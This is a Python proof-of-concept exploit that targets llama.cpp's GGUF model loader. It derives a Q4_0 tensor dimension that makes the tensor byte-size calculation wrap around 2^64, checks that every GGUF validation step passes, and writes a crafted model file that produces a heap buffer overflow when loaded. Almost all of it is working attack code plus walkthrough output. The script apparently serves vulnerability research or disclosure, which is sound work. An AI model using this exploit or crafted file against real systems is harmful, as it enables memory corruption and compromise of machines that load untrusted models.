#!/usr/bin/env python3
"""
PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)

=== Vulnerability Summary ===

In ggml_row_size() (ggml.c:1275):

    size_t ggml_row_size(enum ggml_type type, int64_t ne) {
        return ggml_type_size(type)*ne/ggml_blck_size(type);
    }

The multiplication `ggml_type_size(type) * ne` is performed in size_t
(uint64_t) arithmetic.  When type_size * ne > 2^64, this silently wraps
around, producing a much smaller result than expected.  The subsequent
division by blck_size then yields a tiny value.

This propagates to:
- ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
- ggml_nbytes()          (ggml.c:1238) where the tensor byte size is computed
- buffer allocation and data loading code

The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT
COUNT (ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that
the BYTE SIZE (element_count * type_size / blck_size) fits in size_t.
Whenever type_size > 2, the product type_size * ne can exceed 2^64 even
though ne itself fits in int64_t, so the byte size wraps while the
element count passes every check.

The check at gguf.cpp line 589:

    uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type))
        > SIZE_MAX/ggml_type_size(info.t.type)

uses ggml_nelements(), which itself computes ne[0]*ne[1]*ne[2]*ne[3] in
int64_t.  For our chosen values this product fits in int64_t, so
ggml_nelements returns the correct value — but the division-based
comparison is too coarse to reject our value (see the bypass math below).

=== Exploit Strategy ===

For GGML_TYPE_Q4_0:
- type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
- blck_size = 32

We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value:

    ne[0] = 1024819115206086208          (divisible by 32)
    18 * ne[0] = 18446744073709551744 = 2^64 + 128
    In uint64:  18 * ne[0] mod 2^64 = 128
    After /32:  128 / 32 = 4 bytes       (ggml_row_size returns 4!)

    Correct:  18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
    Computed: 4 bytes
    Ratio:    buffer is 144,115,188,075,855,873x too small!

Validation bypass:
- ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
- ne[0] > 0                                                      -> passes
- ne[0] % 32 == 0                       (block alignment check)  -> passes
- ggml_nelements = ne[0] = 1024819115206086208
- nelements/32   = 32025597350190194
- SIZE_MAX/18    = 1024819115206086200
- 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!

Result: a tensor is created with ne[0] = 1024819115206086208 elements but
backed by only 4-32 bytes of actual buffer.  Any operation that accesses
data beyond the first few bytes triggers a heap buffer overflow.

=== GGUF Binary Format Reference ===

Header:
- Magic: "GGUF" (4 bytes)
- Version: uint32 (3)
- n_tensors: uint64
- n_kv: uint64

KV pairs:
- key: string (uint64 len + chars)
- type: uint32 (GGUF type enum)
- value: type-dependent

Tensor info (per tensor):
- name: string (uint64 len + chars)
- n_dims: uint32
- ne[0..n_dims-1]: int64 each
- type: uint32 (ggml_type enum)
- offset: uint64

Data section: aligned to ctx->alignment (default 32)
"""

import math
import os
import struct
import sys

# ============================================================
# GGUF constants
# ============================================================

GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3

# GGUF value types
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12

# struct format string for each scalar GGUF value type (little-endian)
_SCALAR_FMT = {
    GGUF_TYPE_UINT8: '<B',
    GGUF_TYPE_INT8: '<b',
    GGUF_TYPE_UINT16: '<H',
    GGUF_TYPE_INT16: '<h',
    GGUF_TYPE_UINT32: '<I',
    GGUF_TYPE_INT32: '<i',
    GGUF_TYPE_FLOAT32: '<f',
    GGUF_TYPE_BOOL: '<?',
    GGUF_TYPE_UINT64: '<Q',
    GGUF_TYPE_INT64: '<q',
    GGUF_TYPE_FLOAT64: '<d',
}

# ggml_type enum values
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1
GGML_TYPE_Q4_0 = 2
GGML_TYPE_Q4_1 = 3
GGML_TYPE_Q5_0 = 6
GGML_TYPE_Q5_1 = 7
GGML_TYPE_Q8_0 = 8
GGML_TYPE_I8 = 24
GGML_TYPE_I32 = 26

# Q4_0 type properties
Q4_0_TYPE_SIZE = 18  # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
Q4_0_BLCK_SIZE = 32  # QK4_0

INT64_MAX = (1 << 63) - 1
UINT64_MAX = (1 << 64) - 1
SIZE_MAX = UINT64_MAX  # 64-bit platform
GGML_DEFAULT_ALIGNMENT = 32


# ============================================================
# Helper functions
# ============================================================

def write_string(f, s):
    """Write a GGUF string: uint64 length + UTF-8 bytes (no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)


def write_kv_scalar(f, key, vtype, value):
    """Write one scalar KV pair: key string, value-type tag, raw value."""
    write_string(f, key)
    f.write(struct.pack('<I', vtype))
    if vtype == GGUF_TYPE_STRING:
        write_string(f, value)
    else:
        f.write(struct.pack(_SCALAR_FMT[vtype], value))


def write_kv_array(f, key, elem_type, values):
    """Write one array KV pair: key, ARRAY tag, element type, count, elements."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', elem_type))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        if elem_type == GGUF_TYPE_STRING:
            write_string(f, v)
        else:
            f.write(struct.pack(_SCALAR_FMT[elem_type], v))


def compute_overflow_ne0():
    """Return a Q4_0 ne[0] whose byte size wraps around 2^64.

    We want type_size * ne0 == 2^64 + 128 exactly, so that in uint64_t
    arithmetic the product becomes 128 and ggml_row_size() returns
    128 / 32 = 4 bytes.  2^64 + 128 is divisible by 18, giving
    ne0 = 1024819115206086208, which is also divisible by the block
    size (32) and fits in int64_t — so it passes every GGUF check.
    """
    ne0 = ((1 << 64) + 128) // Q4_0_TYPE_SIZE  # == 1024819115206086208
    # Sanity checks: exact product, tiny wrapped value, block-aligned, int64-safe.
    assert Q4_0_TYPE_SIZE * ne0 == (1 << 64) + 128
    assert (Q4_0_TYPE_SIZE * ne0) % (1 << 64) == 128
    assert ne0 % Q4_0_BLCK_SIZE == 0
    assert ne0 < (1 << 63)
    return ne0


def verify_overflow(ne0, ne1, ne2, ne3):
    """Re-run (in exact Python arithmetic) every relevant gguf.cpp check.

    Demonstrates that the chosen dimensions pass all validation, then
    reproduces ggml's size computations in wrapped uint64_t arithmetic.

    Returns (data_size, nbytes, padded): the wrapped data size from
    ggml_new_tensor_impl, the wrapped ggml_nbytes value, and the padded
    allocation size.
    """
    type_size = Q4_0_TYPE_SIZE
    blck_size = Q4_0_BLCK_SIZE

    print(f"\n{'='*70}")
    print("VALIDATION CHECK SIMULATION")
    print(f"{'='*70}")

    # Check 1: all dimensions non-negative.
    assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
    print("[PASS] All ne[j] >= 0 (non-negative check)")

    # Check 2: gguf.cpp lines 550-552 — element-count overflow check.
    # Each `INT64_MAX/ne[j] <= partial_product` must be FALSE to pass.
    check1 = INT64_MAX // ne1 <= ne0
    print(f"  Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
    assert not check1, "Failed overflow check 1!"

    prod01 = ne0 * ne1  # exact in Python (arbitrary precision)
    assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
    check2 = INT64_MAX // ne2 <= prod01
    print(f"  Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
    assert not check2, "Failed overflow check 2!"

    prod012 = prod01 * ne2
    assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
    check3 = INT64_MAX // ne3 <= prod012
    print(f"  Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}")
    assert not check3, "Failed overflow check 3!"
    print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")

    # Check 3: gguf.cpp line 580 — ne[0] must be a multiple of the block size.
    assert ne0 % blck_size == 0
    print("[PASS] ne[0] % blck_size == 0 (block alignment check)")

    # Check 4: gguf.cpp line 589 — byte size representable in size_t.
    nelements = ne0 * ne1 * ne2 * ne3
    assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
    lhs = nelements // blck_size   # uint64_t(ggml_nelements/blck_size)
    rhs = SIZE_MAX // type_size    # SIZE_MAX/type_size
    byte_check = lhs > rhs
    print(f"  Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
    assert not byte_check, "Failed byte size check!"
    print("[PASS] Byte size check at gguf.cpp:589 bypassed")

    # ---- Now compute the ACTUAL overflow ----
    print(f"\n{'='*70}")
    print("SIZE COMPUTATION (showing the overflow)")
    print(f"{'='*70}")

    # ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
    true_product = type_size * ne0
    wrapped_product = true_product % (1 << 64)  # uint64_t wrap
    row_size_overflowed = wrapped_product // blck_size
    row_size_correct = true_product // blck_size
    print("\nggml_row_size computation:")
    print(f"  type_size * ne[0]       = {true_product}")
    print(f"                          = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
    print(f"  In uint64_t (mod 2^64): {wrapped_product}")
    print(f"  After / blck_size:      {row_size_overflowed} bytes  <-- OVERFLOWED!")
    print(f"  Correct value:          {row_size_correct} bytes")
    print(f"  Overflow factor:        {row_size_correct / row_size_overflowed:.0f}x too small!")

    # data_size as computed by ggml_new_tensor_impl (size_t arithmetic).
    data_size = row_size_overflowed
    for dim in (ne1, ne2, ne3):
        if dim > 1:
            data_size = (data_size * dim) % (1 << 64)
    correct_size = row_size_correct * ne1 * ne2 * ne3
    print("\ndata_size (ggml_new_tensor_impl):")
    print(f"  Computed: {data_size} bytes")
    print(f"  Correct:  {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")

    # ggml_nbytes for quantized types:
    #   nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i])
    nb0 = type_size                        # = 18
    nb1 = type_size * (ne0 // blck_size)   # no overflow: ne0/32 is moderate
    nb2 = nb1 * ne1
    nb3 = nb2 * ne2

    # ne[0] * nb[0] overflows!
    ne0_nb0_true = ne0 * nb0
    ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
    nbytes_first = ne0_nb0_wrapped // blck_size
    nbytes = nbytes_first
    if ne1 > 1:
        nbytes += (ne1 - 1) * nb1
    if ne2 > 1:
        nbytes += (ne2 - 1) * nb2
    if ne3 > 1:
        nbytes += (ne3 - 1) * nb3
    nbytes_correct = correct_size
    print("\nggml_nbytes:")
    print(f"  ne[0]*nb[0]     = {ne0} * {nb0} = {ne0_nb0_true}")
    print(f"  In uint64_t:    {ne0_nb0_wrapped}")
    print(f"  / blck_size:    {nbytes_first}")
    print(f"  + stride terms: {nbytes - nbytes_first}")
    print(f"  Total nbytes:   {nbytes} bytes")
    print(f"  Correct value:  {nbytes_correct} bytes")

    # What gets allocated vs what the tensor "thinks" it has.
    padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1)
              // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
    print(f"\n{'='*70}")
    print("HEAP BUFFER OVERFLOW")
    print(f"{'='*70}")
    print(f"  Buffer allocated:    {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
    print(f"  Tensor logical size: {nbytes_correct} bytes")
    print(f"  Overflow:            {nbytes_correct - padded} bytes beyond allocation")
    print(f"  Stride nb[1]:        {nb1} bytes (distance between rows)")
    print(f"  Any access to row 1+ is {nb1 - padded} bytes out of bounds!")

    return data_size, nbytes, padded


def create_poc_gguf(output_path):
    """Create a GGUF file whose single Q4_0 tensor triggers the overflow.

    The tensor's ne[0] makes ggml_row_size() wrap around 2^64, so ggml
    allocates a tiny buffer for what should be an enormous tensor.

    Returns output_path.
    """
    ne0 = compute_overflow_ne0()
    ne1 = 1  # a 1-D tensor is enough to trigger the overflow
    ne2 = 1
    ne3 = 1

    data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)

    # Minimal llama-architecture metadata so llama.cpp proceeds with loading.
    # 13 scalar KVs + 3 array KVs = 16 total.
    scalar_kvs = [
        ("general.architecture", GGUF_TYPE_STRING, "llama"),
        ("general.name", GGUF_TYPE_STRING, "poc"),
        ("llama.context_length", GGUF_TYPE_UINT32, 2048),
        ("llama.embedding_length", GGUF_TYPE_UINT32, 4096),
        ("llama.block_count", GGUF_TYPE_UINT32, 1),
        ("llama.feed_forward_length", GGUF_TYPE_UINT32, 11008),
        ("llama.rope.dimension_count", GGUF_TYPE_UINT32, 128),
        ("llama.attention.head_count", GGUF_TYPE_UINT32, 32),
        ("llama.attention.head_count_kv", GGUF_TYPE_UINT32, 32),
        ("llama.attention.layer_norm_rms_epsilon", GGUF_TYPE_FLOAT32, 1e-5),
        ("tokenizer.ggml.model", GGUF_TYPE_STRING, "llama"),
        ("tokenizer.ggml.bos_token_id", GGUF_TYPE_UINT32, 1),
        ("tokenizer.ggml.eos_token_id", GGUF_TYPE_UINT32, 2),
    ]
    # Tiny vocabulary so the tokenizer metadata parses.
    vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
    vocab_scores = [0.0, 0.0, 0.0, -1.0]
    vocab_types = [0, 3, 3, 1]  # NORMAL=0, CONTROL=3, NORMAL=1
    n_kv = len(scalar_kvs) + 3  # 13 scalar + 3 array = 16

    # One tensor with overflow-inducing dimensions; use a name llama.cpp
    # expects for a llama model.
    tensor_name = "token_embd.weight"
    n_tensors = 1

    print(f"\n{'='*70}")
    print("GENERATING GGUF FILE")
    print(f"{'='*70}")
    print(f"  Tensor:     '{tensor_name}'")
    print(f"  Type:       Q4_0 (type_size=18, blck_size=32)")
    print(f"  Dimensions: ne[0]={ne0}")
    print(f"  Tensor data in file: {padded_size} bytes (the overflowed/small size)")
    print(f"  Output:     {output_path}")

    with open(output_path, 'wb') as f:
        # ---- GGUF header ----
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', n_kv))

        # ---- KV pairs ----
        for key, vtype, value in scalar_kvs:
            write_kv_scalar(f, key, vtype, value)
        write_kv_array(f, "tokenizer.ggml.tokens", GGUF_TYPE_STRING, vocab_tokens)
        write_kv_array(f, "tokenizer.ggml.scores", GGUF_TYPE_FLOAT32, vocab_scores)
        write_kv_array(f, "tokenizer.ggml.token_type", GGUF_TYPE_INT32, vocab_types)

        # ---- Tensor info ----
        write_string(f, tensor_name)
        f.write(struct.pack('<I', 1))               # n_dims
        f.write(struct.pack('<q', ne0))             # ne[0] (int64)
        f.write(struct.pack('<I', GGML_TYPE_Q4_0))  # type
        f.write(struct.pack('<Q', 0))               # offset in data section

        # ---- Alignment padding before the data section ----
        padding_needed = (-f.tell()) % GGML_DEFAULT_ALIGNMENT
        if padding_needed > 0:
            f.write(b'\x00' * padding_needed)

        # ---- Tensor data ----
        # Write exactly padded_size bytes (the overflowed small amount).
        # A recognizable fill pattern helps identify OOB reads in a debugger.
        f.write(b'\xAA' * padded_size)

    file_size = os.path.getsize(output_path)
    print(f"  File size: {file_size} bytes")
    print("\n[+] GGUF file written successfully")
    return output_path


def main():
    """Generate the PoC file and print the exploitation walk-through."""
    # Output location: first CLI argument if given, else ./gguf_poc/ in cwd
    # (the previous hard-coded per-user absolute path was not portable).
    if len(sys.argv) > 1:
        output_path = sys.argv[1]
    else:
        output_dir = os.path.join(os.getcwd(), "gguf_poc")
        os.makedirs(output_dir, exist_ok=True)
        output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")

    print("=" * 70)
    print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
    print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
    print("=" * 70)

    # Step 1: compute the overflow-inducing dimension.
    ne0 = compute_overflow_ne0()
    print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
    print(f"    = 0x{ne0:016X}")
    print(f"    Fits in int64_t: {ne0 < (1 << 63)}")
    print(f"    Divisible by 32: {ne0 % 32 == 0}")

    # Steps 2-3: verify the validation bypass and write the file.
    print("\n[+] Verifying validation bypass and computing overflow...")
    create_poc_gguf(output_path)

    # Step 4: instructions.
    wrapped = (ne0 * 18) % (1 << 64)
    print(f"\n{'='*70}")
    print("EXPLOITATION")
    print(f"{'='*70}")
    print(f"""
When llama.cpp loads this GGUF file:

1. gguf_init_from_file() reads tensor info:
   - ne[0] = {ne0}
   - type  = Q4_0 (type_size=18, blck_size=32)
   - All validation checks PASS (see analysis above)

2. ggml_nbytes() computes tensor size:
   - ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
   - In uint64_t:  {wrapped}  (OVERFLOWED!)
   - Result: {wrapped // 32} bytes instead of {ne0 * 18 // 32}

3. Buffer allocation uses the tiny overflowed size
   -> Only {(wrapped // 32 + 31) // 32 * 32} bytes allocated

4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
   -> Any access beyond the first few bytes is a HEAP BUFFER OVERFLOW

To test with llama-cli (demonstrates GGUF validation bypass):
    ./llama-cli -m {output_path} -p 'hello' 2>&1
    # Note: llama-cli rejects at model-level shape check, but GGUF parsing passes

To test with the C test harness (demonstrates the actual overflow):
    ./test_tensor_overflow {output_path}
    # Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
""")


if __name__ == "__main__":
    main()